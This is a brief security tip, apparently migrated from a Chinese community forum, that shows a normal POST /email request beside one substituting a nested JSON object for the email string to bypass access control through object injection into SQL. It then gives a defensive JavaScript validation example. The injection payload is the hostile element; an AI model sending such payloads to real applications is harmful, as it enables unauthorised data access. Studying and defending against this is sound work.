Access-control bypass testing tip: using Object Injection
POST /email
Host: localhost
Content-Type: application/json

{"email":"guest@example.com"}
-------------------
POST /email
Host: localhost
Content-Type: application/json

{"email":{"email":"1"}}
Reference: Object Injection to SQL Injection
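The second request swaps a string for a nested object, so the check that stops it is strict type validation before the value reaches the data layer. The following is an added example, not code from the original post: `EMAIL_SCHEMA`, `validateBody`, `handleEmail` and the toy `naiveBind` (a constructed stand-in for a data layer that renders objects as key/value pairs, not a real library) are assumptions for illustration.

```javascript
// Added example. Schema, function names and the toy binder are assumptions.
const EMAIL_SCHEMA = { email: "string" };

// Constructed stand-in for a data layer that renders an object parameter as
// `key` = 'value' pairs instead of one quoted scalar (not a real library).
function naiveBind(template, value) {
  const quote = (v) => "'" + String(v).replace(/'/g, "''") + "'";
  const rendered =
    value !== null && typeof value === "object"
      ? Object.entries(value).map(([k, v]) => "`" + k + "` = " + quote(v)).join(", ")
      : quote(value);
  return template.replace("?", () => rendered);
}

// Accept the body only if it is a JSON object whose fields are exactly the
// schema's fields and each one is a primitive of the declared type.
function validateBody(raw, schema) {
  let body;
  try {
    body = JSON.parse(raw);
  } catch {
    return { ok: false, error: "invalid JSON" };
  }
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    return { ok: false, error: "body must be a JSON object" };
  }
  for (const key of Object.keys(body)) {
    if (!Object.prototype.hasOwnProperty.call(schema, key)) {
      return { ok: false, error: "unexpected field: " + key };
    }
  }
  for (const [key, type] of Object.entries(schema)) {
    if (typeof body[key] !== type) {
      return { ok: false, error: key + " must be a " + type };
    }
  }
  return { ok: true, value: body };
}

// Handler sketch for POST /email: validate first, bind second.
function handleEmail(raw) {
  const checked = validateBody(raw, EMAIL_SCHEMA);
  if (!checked.ok) return { status: 400, error: checked.error };
  const sql = naiveBind("SELECT id FROM users WHERE email = ?", checked.value.email);
  return { status: 200, sql };
}
```

With the first request body the handler returns 200 and a single quoted scalar; with the second it returns 400 before any query text is built.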
#火线Zone Tips#



This post was migrated from the 知识星球 (Knowledge Planet) community “火线Zone”.